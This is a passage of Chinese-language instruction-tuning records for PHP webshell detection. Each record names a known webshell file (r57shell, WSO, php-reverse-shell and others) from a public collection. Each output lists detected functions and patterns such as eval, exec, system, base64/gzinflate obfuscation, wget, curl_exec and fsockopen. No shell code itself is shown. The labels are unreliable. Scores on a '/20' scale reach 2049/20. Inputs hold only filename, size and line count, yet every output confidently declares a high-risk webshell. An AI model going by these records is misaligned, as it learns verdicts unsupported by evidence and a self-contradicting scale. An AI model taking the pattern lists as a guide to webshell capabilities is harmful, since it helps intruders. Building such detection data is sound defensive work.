这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/bdshell.php", "malicious_score": 34, "md5_hash": "122e9839a94733ecccb0dfaae8ed738c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"from_the_wild1.php\", \"文件类型\": \"php\", \"文件大小\": \"2457 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/from_the_wild1.php", "malicious_score": 13, "md5_hash": "a9479d83b46fa4b47642faf7866ed67a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SnIpEr_SA Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"103794 bytes\", \"行数\": 2246}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1219/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/SnIpEr_SA Shell.php", "malicious_score": 1219, "md5_hash": "52c45e73dbe12be56f8826da07011663"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ZoRBaCK Connect.php\", \"文件类型\": \"php\", \"文件大小\": \"1405 bytes\", \"行数\": 56}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fputs(, $_POST[, system(, fputs ( 包含网络功能: fsockopen 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/ZoRBaCK Connect.php", "malicious_score": 37, "md5_hash": "6cb98560df19790d6bfd2d29a3a7fec5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php\", \"文件类型\": \"php\", \"文件大小\": \"5306 bytes\", \"行数\": 89}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_GET[ 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php", "malicious_score": 15, "md5_hash": "49ad9117c96419c35987aaa7e2230f63"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cpanel.php\", \"文件类型\": \"php\", \"文件大小\": \"8951 bytes\", \"行数\": 178}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, exec(, eval(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: curl_exec 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 55/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/cpanel.php", "malicious_score": 55, "md5_hash": "27d59c8914ee43ee6f057fbb17473003"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"erne.php\", \"文件类型\": \"php\", \"文件大小\": \"44018 bytes\", \"行数\": 1453}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_POST[, exec( 发现混淆技术: pack\\s*\\( 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 215/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/erne.php", "malicious_score": 215, "md5_hash": "4741ba220b5fdc23bfe99ad523c2c368"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zaco.php\", \"文件类型\": \"php\", \"文件大小\": \"16028 bytes\", \"行数\": 502}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, eval( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 144/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/zaco.php", "malicious_score": 144, "md5_hash": "74295f8f6a292afc35f22f045dfc8561"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"s72 Shell v1.1 Coding.php\", \"文件类型\": \"php\", \"文件大小\": \"5261 bytes\", \"行数\": 141}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 具备文件操作能力: copy\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/s72 Shell v1.1 Coding.php", "malicious_score": 7, "md5_hash": "9136a2b2603d1f2a3daeba521537ae05"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57shell v.1.42 - Edited By KingDefacer.php\", \"文件类型\": \"php\", \"文件大小\": \"191866 bytes\", \"行数\": 7758}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, base64_decode(, file_get_contents(, $_GET[, fwrite( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 2049/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/r57shell v.1.42 - Edited By KingDefacer.php", "malicious_score": 2049, "md5_hash": "3ca2c1be0a05f1b6a8ef251426d33af3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"KAdot Universal Shell v0.1.6.php\", \"文件类型\": \"php\", \"文件大小\": \"4884 bytes\", \"行数\": 229}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_POST[, fputs(, eval(, passthru( 发现混淆技术: base64_decode 包含网络功能: fsockopen 具备文件操作能力: copy\\s*\\( 恶意度评分: 82/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/KAdot Universal Shell v0.1.6.php", "malicious_score": 82, "md5_hash": "3529a116017ece53288e66e96e6a4892"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"nsT View.php\", \"文件类型\": \"php\", \"文件大小\": \"83716 bytes\", \"行数\": 2136}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, exec(, eval( 发现混淆技术: base64_decode 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 765/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/nsT View.php", "malicious_score": 765, "md5_hash": "93e84165804ac1fced2364d9bbdd4cf7"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"angel.php\", \"文件类型\": \"php\", \"文件大小\": \"77367 bytes\", \"行数\": 2144}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"/[email]/e, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 101/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/angel.php", "malicious_score": 101, "md5_hash": "f299ed793cf7ff495f89793cbed98057"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"lolipop.php\", \"文件类型\": \"php\", \"文件大小\": \"13640 bytes\", \"行数\": 288}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval(, $_GET[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 158/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/lolipop.php", "malicious_score": 158, "md5_hash": "d61fc754116b2197ea32b5bf34976a2f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Command Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"17540 bytes\", \"行数\": 646}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, exec(, system( 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 55/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Command Shell.php", "malicious_score": 55, "md5_hash": "eb83f80b8efb11f1de3b5863a95d5335"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Antichat_Shell_v1.3.php\", \"文件类型\": \"php\", \"文件大小\": \"9178 bytes\", \"行数\": 180}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Antichat_Shell_v1.3.php", "malicious_score": 48, "md5_hash": "40d0abceba125868be7f3f990f031521"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菊花聊天室.php\", \"文件类型\": \"php\", \"文件大小\": \"1858 bytes\", \"行数\": 41}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/菊花聊天室.php", "malicious_score": 8, "md5_hash": "0be750b2f6f5c28a50d264bcf95c0e27"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"FaTaL Shell v1.0 - Edited By KingDefacer.php\", \"文件类型\": \"php\", \"文件大小\": \"19031 bytes\", \"行数\": 288}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, exec(, system(, eval( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 147/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/FaTaL Shell v1.0 - Edited By KingDefacer.php", "malicious_score": 147, "md5_hash": "281ef76da59420b64ea399323a2eb679"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"get.php\", \"文件类型\": \"php\", \"文件大小\": \"1131 bytes\", \"行数\": 37}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, exec( 包含网络功能: curl_exec 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\(, file_put_contents 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/get.php", "malicious_score": 10, "md5_hash": "46d1231983f2a818409a735f7a11cfe9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Safe0ver Shell -Safe Mod Bypass By Evilc0der.php\", \"文件类型\": \"php\", \"文件大小\": \"38673 bytes\", \"行数\": 950}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, exec(, system(, passthru( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 32/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php", "malicious_score": 32, "md5_hash": "e1c2a7330020f846fa9af800637b8dc8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fatal.php\", \"文件类型\": \"php\", \"文件大小\": \"19319 bytes\", \"行数\": 288}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, exec(, system(, eval( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 147/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/fatal.php", "malicious_score": 147, "md5_hash": "281ef76da59420b64ea399323a2eb679"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Back Connect.php\", \"文件类型\": \"php\", \"文件大小\": \"1348 bytes\", \"行数\": 44}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fputs(, $_POST[, system(, fputs ( 包含网络功能: fsockopen 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Back Connect.php", "malicious_score": 37, "md5_hash": "c9fac84775b6e81572d93916c9684753"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"lostDC.php\", \"文件类型\": \"php\", \"文件大小\": \"20303 bytes\", \"行数\": 475}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, exec(, system(, $_POST[, fwrite ( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 62/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/lostDC.php", "malicious_score": 62, "md5_hash": "576ed018a4c2b4d6bf14d443e8caba50"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wp-conten1_pass_KoR345Ker78DSa.php\", \"文件类型\": \"php\", \"文件大小\": \"134087 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/wp-conten1_pass_KoR345Ker78DSa.php", "malicious_score": 7, "md5_hash": "721b12725570afa881aaf6bb06fa90d2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57_Mohajer22.php\", \"文件类型\": \"php\", \"文件大小\": \"114318 bytes\", \"行数\": 2369}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1258/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/r57_Mohajer22.php", "malicious_score": 1258, "md5_hash": "e5b2131dd1db0dbdb43b53c5ce99016a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"simple_cmd.php\", \"文件类型\": \"php\", \"文件大小\": \"353 bytes\", \"行数\": 18}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: Shell_Exec(, $_REQUEST[, Exec( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/simple_cmd.php", "malicious_score": 9, "md5_hash": "c6381412df74dbf3bcd5a2b31522b544"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Rootshell.v.1.0.php\", \"文件类型\": \"php\", \"文件大小\": \"9757 bytes\", \"行数\": 246}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 具备文件操作能力: copy\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Rootshell.v.1.0.php", "malicious_score": 10, "md5_hash": "e0823dee1f9ddf471773e5232e453eef"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Win MOF Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"2121 bytes\", \"行数\": 78}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Win MOF Shell.php", "malicious_score": 36, "md5_hash": "f59f0c1d02989c5e9151b96ea2a0cb1d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Silic Group Hacker Army - BlackBap.Org.php\", \"文件类型\": \"php\", \"文件大小\": \"141097 bytes\", \"行数\": 2234}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, gzinflate(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1243/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Silic Group Hacker Army - BlackBap.Org.php", "malicious_score": 1243, "md5_hash": "7f4a62feba8c527fa2b66c3b93de77e0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"WSO2.7 404 Error Web Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"96949 bytes\", \"行数\": 2019}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_POST[, exec(, system( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 906/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/WSO2.7 404 Error Web Shell.php", "malicious_score": 906, "md5_hash": "8850644d077fc90ab62bf9599df7d6ce"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Lolipop.php - Edited By KingDefacer.php\", \"文件类型\": \"php\", \"文件大小\": \"13352 bytes\", \"行数\": 288}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval(, $_GET[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 158/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Lolipop.php - Edited By KingDefacer.php", "malicious_score": 158, "md5_hash": "d61fc754116b2197ea32b5bf34976a2f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SimShell_1.0_-_Simorgh_Security_MGZ.php\", \"文件类型\": \"php\", \"文件大小\": \"5345 bytes\", \"行数\": 180}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/SimShell_1.0_-_Simorgh_Security_MGZ.php", "malicious_score": 48, "md5_hash": "85f7abadbc33982a4d4bee082334f242"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zacosmall.php\", \"文件类型\": \"php\", \"文件大小\": \"16378 bytes\", \"行数\": 501}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, eval( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 144/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/zacosmall.php", "malicious_score": 144, "md5_hash": "5295ee8dc2f5fd416be442548d68f7a6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"DDoS attack.php\", \"文件类型\": \"php\", \"文件大小\": \"2732 bytes\", \"行数\": 93}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_POST[, exec(, system(, passthru( 具备文件操作能力: move_uploaded_file, unlink\\s*\\( 恶意度评分: 44/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/DDoS attack.php", "malicious_score": 44, "md5_hash": "57ebd960dc32d6166e694a142449ddfb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Dive_Shell_1.0_Emperor_Hacking_Team.php\", \"文件类型\": \"php\", \"文件大小\": \"5700 bytes\", \"行数\": 187}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Dive_Shell_1.0_Emperor_Hacking_Team.php", "malicious_score": 48, "md5_hash": "34996932c83f46feb48fd1a910171704"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition.php\", \"文件类型\": \"php\", \"文件大小\": \"17887 bytes\", \"行数\": 462}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 124/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition.php", "malicious_score": 124, "md5_hash": "ddc515f35d9c8cbfdbed0d80346ef837"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"iMHaPFtp.php\", \"文件类型\": \"php\", \"文件大小\": \"53740 bytes\", \"行数\": 2061}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, exec(, $_POST[ 发现混淆技术: base64_decode, ord\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, mkdir\\s*\\( 恶意度评分: 188/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/iMHaPFtp.php", "malicious_score": 188, "md5_hash": "ab6a7f35be6017af8c8990c01152f1d1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"GFS web-shell ver 3.1.7 - PRiV8.php\", \"文件类型\": \"php\", \"文件大小\": \"25446 bytes\", \"行数\": 618}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, exec(, system(, passthru(, shell_exec( 具备文件操作能力: fopen\\s*\\( 恶意度评分: 91/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/GFS web-shell ver 3.1.7 - PRiV8.php", "malicious_score": 91, "md5_hash": "b406321e009a660ebb2054c1892132cf"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP整站打包程序-By DoDo.php\", \"文件类型\": \"php\", \"文件大小\": \"9929 bytes\", \"行数\": 342}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_REQUEST[, eval( 发现混淆技术: pack\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, mkdir\\s*\\(, fwrite\\s*\\( 恶意度评分: 103/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHP整站打包程序-By DoDo.php", "malicious_score": 103, "md5_hash": "53446381f7ea718ac13be71018668e3a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"WebShell.php\", \"文件类型\": \"php\", \"文件大小\": \"44980 bytes\", \"行数\": 1086}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, exec(, system(, passthru( 包含网络功能: fsockopen 具备文件操作能力: unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 132/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/WebShell.php", "malicious_score": 132, "md5_hash": "3fff8d4cb728b2ea3d42c39d9d0fef80"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php-reverse-shell.php\", \"文件类型\": \"php\", \"文件大小\": \"5491 bytes\", \"行数\": 192}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite( 包含网络功能: fsockopen 具备文件操作能力: fwrite\\s*\\( 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/php-reverse-shell.php", "malicious_score": 11, "md5_hash": "5f8af08f753e5d318d307e75ad91c039"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"moon_1php.php\", \"文件类型\": \"php\", \"文件大小\": \"2517 bytes\", \"行数\": 101}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents (, fwrite ( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/moon_1php.php", "malicious_score": 23, "md5_hash": "27ef056d66a76b50e2144c21dbafa3ec"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PostgreSQL数据库操纵.php\", \"文件类型\": \"php\", \"文件大小\": \"3899 bytes\", \"行数\": 90}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 39/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PostgreSQL数据库操纵.php", "malicious_score": 39, "md5_hash": 